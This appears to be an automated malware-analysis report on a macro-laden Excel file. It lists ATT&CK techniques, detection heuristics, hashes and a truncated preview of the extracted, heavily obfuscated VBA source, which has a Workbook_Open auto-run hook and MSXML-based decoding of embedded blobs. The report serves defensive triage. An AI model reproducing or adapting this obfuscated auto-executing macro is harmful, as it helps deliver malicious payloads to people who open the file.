Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The OOXML file contains a Workbook_Open VBA macro that uses CreateObject and Shell() calls, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated with loops and meaningless variable names, suggesting it is designed to download and run a secondary payload. No specific IOCs like URLs or file paths were directly extractable from the obfuscated script.
Heuristics (6)
- VBA project inside OOXML (medium, 4 related findings, OOXML_VBA): Document contains a VBA project (VBA macros present)
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15866 bytes |

SHA-256: c36d302d468edd885aadd672bcb18523926ec250eec377a20b060a9cf94e68ba

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 5 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
NIWEddPGn_wMxnC.N1h6ucUPzurqxAXWLrtT
While 17 = 9453
Dim r9WKxZOo7fzQl1_1p4R9FnMLznbXZkiBTy_OcVGSMoSR4Y As String
Wend
Dim AgqQYtMCtIT As Integer
While 2 = 3605
Dim H7zNU7w6vusWRv8uZT4QYifW33PlikB As String
Wend
Dim dRB9VVZ7UFcQIP As Integer
While 18 = 5258
Dim HWeZ9vqz24iZbUaoIUJsNDPvkW_VgJ6PUEseuKjxSmZFY53_ As String
Wend
Dim dp6FFZA_Er As Integer
While 9 = 1323
Dim xkvSRp8Q_Vl638uUYjmIVpc421NxI4DnXBV8A As String
Wend
Dim TsHFyfbhv7 As Integer
While 21 = 7163
Dim TtAYZ5TGF1aaaHFIQ7f1jvTYO3ANz7aRDPcY3mLbqM1H As String
Wend
Dim f3Q9_nNdA5 As Integer
While 16 = 6079
Dim UhYjIg4_QHXHVJopPmtCHU5J3VkANJr7PH44_Qcnhk6qsWeESRWjs7 As String
Wend
Dim u_lMqv53zEZa1 As Integer
While 12 = 1276
Dim MPtp8I_dgYLZe1dp5vFMRV4QujpsotyPQePyilYZmbMiYwK5YK As String
Wend
Dim SRLg1Ub4VbU As Integer
While 13 = 6337
Dim yvi6G9ioFQVpjzHS17XtRbye7_7YbFrB7PlZ_boKTtDl6k As String
Wend
Dim lqqBj68qCV As Integer
While 15 = 1898
Dim D8BBIK_iTsRMrRXQLXhWKhTbNqYeuCNMOb6clHJgDBk2Sc9rKnuQd8tdmi As String
Wend
Dim vavcxPdD7NV4 As Integer
While 2 = 2293
Dim oCM_SH7bGurqSFQ6sQqazBUsujMSWNesUP9qDcnkfJZ_sD As String
Wend
Dim Hp9gTog5ClqdN As Integer
While 19 = 4043
Dim r5lD3O8TBGi1OlE4ojT9pZfTy4yKYM As String
Wend
Dim U_iN5o3EgtusF As Integer
While 27 = 3913
Dim hXoDBZAWAUdgQWQN9Zu5xuiQ_qY_iCjM7S86HyvuXyTnD As String
Wend
Dim pmQkzhR9wQvyWC As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NIWEddPGn_wMxnC"
Dim kuA327EtDljrI2w2YNo51OJbDnIBS3_e8RzTg4VT7fpAVTEWNIn7X_fUjhyMwCYIg_tzBaSd1S7SiHErguwINGE3vct9DHg4FecQjNUwyH__FKuZbFo As String
Dim cYXEn1rPSMVgsAy_GeXHb5cRCk9ZQqNFa_984ZN_T3wqHZmcEinOhxXg5ECC2Q9l8OErA1_pOXwhGvIk7dSqB9gmkaBxWKFB4Ir2T4bNd89HAyYG6Z_V8Pi9qbFixOQDPtn7DPPBBDKD_W As String
Dim PRU4IsO2k_bbCZ5MNRVKOG6DAZMWNG6_lN1rxKkBJ1u63Zrnsm_aAbrHVQ3rd1mcHWzxhLYCqTAX As Integer
Function T__x8tPj7YU_Hm_f8Z4MSDGWrdQMHBJEuuatWAV3v_o2OuXn9(BMktVGIyjpnxKF1Oslwf6fnxwJvibiaDHl1o6uaxh7fc3T9fX7Aky_8dhv6KTjVANiohNJS7J978_J4aJOJdgzNGnVEHxNb8jdMSoYQLmDYyB9dW2d__Y1cWSf42DIG5f9Vd6ivu871)
While 4 = 1772
Dim g17E3W7trUor9roNFBomLIIlOBVDanMUzxy7eGVAWs2GpWjJIGioB8wVp As String
Wend
Dim Szz_2RCGS1J2qs8 As Integer
While 14 = 1820
Dim omOcQA51aK3R_gS2_bPKPe_dZy_VfXRbXj_WrS_oW9Xx897i99IYZfqH As String
Wend
Dim mtCa_hTB3Z4d As Integer
While 5 = 6016
Dim g5IpVjwPFJeZ1ZVfM2B121t7PlnynV5g_aBDx As String
Wend
Dim cBysYBbNkjiJww As Integer
cYXEn1rPSMVgsAy_GeXHb5cRCk9ZQqNFa_984ZN_T3wqHZmcEinOhxXg5ECC2Q9l8OErA1_pOXwhGvIk7dSqB9gmkaBxWKFB4Ir2T4bNd89HAyYG6Z_V8Pi9qbFixOQDPtn7DPPBBDKD_W = "MsXMl" & "2.dOMDOCumEnt"
While 2 = 6187
Dim WClpJKYs68ltN7UYXRrtzKFbxPrnBDm1h5HByU3kDQ2uwQLPOIJ2DCHK5H As String
Wend
Dim ctp1StJRxSiC As Integer
While 5 = 4703
Dim XEpgRUnfCaX13tveu7Eoc9GRjAZBF4a5jGc8Vk2hdTyBUx As String
Wend
Dim h8ofzL3hX7 As Integer
While 26 = 9437
Dim V6Q4kYH9bPuPwHI_gJHHE6uB2DZVkrphDA9nin25pB3gLPIfVuorYO1ZIOB As String
Wend
Dim g8uWtjKLvHd As Integer
Dim Vj_2GvT69YxmjKkfSTXo2PtVfsozrXaQWAo1MPvc_7krTeBPACqWQnQEzqTXFdLj7fOhetRCh5o5nAA_qWxopC9rsi_e5WVdsAuwObtPsnyV8UZypSprog33gfy6swFIhIJmOLtNmf
While 5 = 3359
Dim e3QMbCCMyj44_zB7HwHgdRkT64nH6ACVV1NvYKwwW5ZZlCug As String
Wend
Dim qmBXlj_KP7PgX3Q As Integer
While 22 = 1812
Dim xffgHjOf7_UIh2Jq3HEaR8msuzCdb5 As String
Wend
Dim NWcml3Eel7ZE_ As Integer
While 11 = 8598
Dim WPZZSENVWRa8y3vuQftDBu7o5OPkWfH_L3NaTXsXL As String
Wend
Dim g1_Bnv_RsTYoB As Integer
Dim ZrqYf9VU7Oclhd6xNZjxVwNDzcOoAv23gpVHcRaJ9rKBbRH4OT3kGIHlbmiBsqTJ
... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 45568 bytes |

SHA-256: 26afe8bdc8c0721b061167bc7cfb01aaf218c23fe81d651f23a3db6e72ba7008

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 5 long base64-like blobs)